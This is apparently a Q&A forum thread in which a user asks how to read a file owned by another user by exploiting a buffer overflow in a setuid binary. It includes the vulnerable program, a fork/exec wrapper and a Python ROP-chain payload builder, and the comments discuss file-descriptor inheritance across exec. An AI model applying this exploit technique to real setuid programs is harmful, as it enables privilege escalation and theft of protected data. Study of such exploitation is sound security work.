# File descriptor in fork() when child executes execve with setuid bit set

Tags: c, linux, security, stdio

Have this program, it opens a File Descriptor to /etc/secret which is owned by userA and set to only be read by userA.

-r-------- 1 userA userA secret

The program forks a child via execve which is a binary with setuid bit set to userA

-r-sr-x--- 1 userA userB prog

prog has a buffer overflow. Stack is nonexecutable. I managed to write a ROP chain that calls read(). For read I need a descriptor parameter, I would like it to be the descriptor of /etc/secret.

Is it possible to modify it that /etc/secret descriptor is opened? Since now I get permission denied, which make sense, since I am calling it as userB. Child runs a program that has setuid bit set (userA), so maybe there is a way to call the open within a child execution stage? Any ideas?

```
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>

int main(void)
{
    pid_t pid;
    int fd;
    int fd1;

    fd1 = open("/etc/secret",O_RDONLY); //file I want to read
    if (fd1 < 0) {
        perror("open");
        return EXIT_FAILURE;
    }
    printf("FD:%d\n",fd1);




    fd = open("in.txt", O_RDONLY); //ROP Chain,Payload that makes read()
    if (fd < 0) {                  //I pass the file descriptor as a parameter
                                   //Normally a integer 3
        perror("open");
        return EXIT_FAILURE;
    }

    if ((pid = fork()) < 0) {
        perror("fork");
        return EXIT_FAILURE;
    } else if (! pid) { /* child */
        dup2(fd, STDIN_FILENO);
        close(fd);



        execlp("/opt/prog", "prog", (char *)0);
        perror("exec");

        return EXIT_FAILURE;
    } else { /* parent */
        printf("Parent waiting\n");

    }

    return EXIT_SUCCESS;
}
```

**Update 1:**

prog source code:

```
#include <stdio.h>
void main(){
    int buf[8];
    read(0, buf, 256);
}
```

**Update 2:**

Rop chain

```
#!/usr/bin/env python
import struct

payload  = "A" * 24
payload += struct.pack("<Q", 0x00000000004005b6)



payload += "A" * 8
payload += struct.pack("<Q", 0x0)        
payload += struct.pack("<Q", 0x1)        
payload += struct.pack("<Q", 0x00000000006006c8) 
payload += struct.pack("<Q", 0x3)                 # Value for RDI register
payload += struct.pack("<Q", 0x0000000000600009)  # Value for RSI register
payload += struct.pack("<Q", 0x8)                 # Value for RDX register
payload += struct.pack("<Q", 0x00000000004005a0)


payload += "E"*56
payload += struct.pack("<Q", 0x00000000004003e0)
f = open("in.txt", "w")
f.write(payload)
```

**Update 3**

Made this test program. /etc/secret is owned by userA and set to read only by userA, I run the program as userB:

test.c

```
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>

int main(void)
{
    pid_t pid;
    int fd;
    int fd1;

    fd1 = open("/etc/secret",O_RDONLY); //file I want to read
    if (fd1 < 0) {
        perror("open");
        return EXIT_FAILURE;
    }
    printf("FD:%d\n",fd1);
}
```

Output is:

./test
open: Permission denied

So I guess there is no way around it, open() checks permissions on file before returning descriptor?

Comment: What is "rop chain"?

Comment: https://en.wikipedia.org/wiki/Return-oriented_programming

Comment: Since you didn't add `O_CLOEXEC` to the `open()` call for `/etc/secret`, that file is open in the child for reading.  You merely need to specify the file descriptor in the appropriate place.  You could ensure that it is always file descriptor 3 in the original program by using `dup2()` (or `dup()`, but it is harder) to make that so.  In classic POSIX systems, there'd be no further issues; I'm not willing to say that Linux doesn't somehow recheck the permissions on an open file descriptor in the exec'd process, but it seems unlikely that it would do so. You're using `execlp()`, not `execvp()`.

Comment: Thanks. Please see Update 3. I guess Linux is checking file permission before returning file descriptor, so I dont have it available in my child.

Answer (score 0):

Well you need to close the pipe from the parent, don't you. And why not open the file in child process.

Comment: Hmm not sure what you mean. As UserB I have no rights to open /etc/secret. Tried that. Open checks permissions on file which is being opened. So with this buffer overflow in place I can read() as userA, but only open as userB